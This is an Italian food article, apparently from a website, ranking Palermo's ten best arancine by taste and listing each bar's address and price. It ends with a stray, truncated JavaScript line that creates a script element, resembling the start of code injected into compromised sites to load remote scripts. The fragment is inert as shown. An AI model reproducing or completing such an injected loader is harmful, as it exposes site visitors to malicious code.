Nel capoluogo siciliano la croccante e gustosa palla di riso, uno dei pilastri dello street food palermitano, è stata nei giorni scorsi protagonista di una severa sfida, fatta di prove di assaggio e rigorosi giudizi da parte di esperti degustatori.

In vista dell’ “arancina day”, com’è definito a Palermo il 13 dicembre, giorno di Santa Lucia, Cronache di gusto, giornale online di enogastronomia, ha stilato la top ten delle arancine migliori di Palermo. La degustazione è stata affrontata dalla redazione partendo dall’analisi visiva e procedendo a quella gusto-olfattiva dei prodotti di alcuni tra i bar e le rosticcerie più famose della città. La classifica che ne è venuta fuori, seppur parziale (prende infatti in considerazione le sole arancine al burro), rappresenta una bussola per orientarsi nel grande territorio del cibo di strada.

Abbiamo segnato per voi su una mappa i primi tre classificati, tappe irrinunciabili della città.

mappa arancine

In vetta alla classifica troviamo Oscar (Via Mariano Migliaccio, 39) che per molti detiene il primato sulla pasticceria e quest’anno lo conquista anche per l’arancina: perfetta nella forma, con una panatura di colore giallo dorato scuro, con un ripieno ricco e gradevole e una crosta consistente e croccante. Prezzo: 1,70 €

Al secondo posto Matranga (Via Cesareo Giovanni Alfredo, 38), pasticceria rinomata per l’alta qualità dei suoi dolci, punto di ritrovo per la colazione. La sua arancina è invitante alla vista, con una panatura mielata ben compatta, molto condita con prevalenza di prosciutto e chicchi di riso ben separati, aspetto non secondario perché è un indicatore della qualità della materia prima. Prezzo: 1,70 €

Terza posizione per Spinnato (Via Principe di Belmonte, 108), bar storico del centro, luogo di accoglienza nel cuore del salotto buono di Palermo. L’arancina di Spinnato ha una panatura compatta dalla leggera doratura, con un ripieno consistente e note spiccate di noce moscata. Prezzo: 1,80 €

Appena fuori da podio, al quarto posto, si classifica la Romanella (Via Giacomo Leopardi, 12): per i palermitani è sinonimo di rosticceria e luogo cult per intere generazioni. L’arancina è caratterizzata da una crosta brunita, un delicato sentore di frittura e un buon ripieno con l’aroma di burro prevalente. Premiata anche per l’ottimo rapporto qualità/prezzo. Prezzo: 1 €

Quinta posizione per il Bristol (Via Emerico Amari, 28), il bar che si affaccia sul porto di Palermo. La sua arancina si presenta appetitosa con una bella doratura ambrata, una crosta croccante e un buon ripieno di mozzarella con abbondante prosciutto. Prezzo: 1,70 €

Al sesto posto il New Paradise (Via Campolo Giovanni, 7), rinomato per la pasticceria. L’arancina appare appetitosa e buona, con una crosta dorata non unta e note intense di burro, ma il riso è un po’ troppo cotto.
Prezzo: 1,70 €

Settimo posto per il bar Recupero (Via Malaspina, 96), celebre per le sue arancine al burro e per il gelato alla nocciola. Arancina dalla panatura brunita, mozzarella preponderante nel ripieno e riso ben cotto con chicchi di riso separati. Prezzo: 1,60 €

Ottava posizione per Scatassa (Via Ammiraglio Rizzo, 65), altro must della città che propone una gradevole versione con aggiunta di piselli al ripieno di prosciutto, mozzarella e besciamella. Prezzo: 1,60 €

Al nono posto il Golden (Viale Alcide De Gasperi), con un’arancina dorata in cui però prevale il sentore di frittura che copre le note di zafferano e di burro. Prezzo: 1,60 €

All’ultimo posto il Coast to Coast (Viale Campania, 29), con un prodotto ben cotto, dalla panatura non unta e con note di noce moscata. Prezzo: 1,60 €

var d=document;var s=d.createElement('script');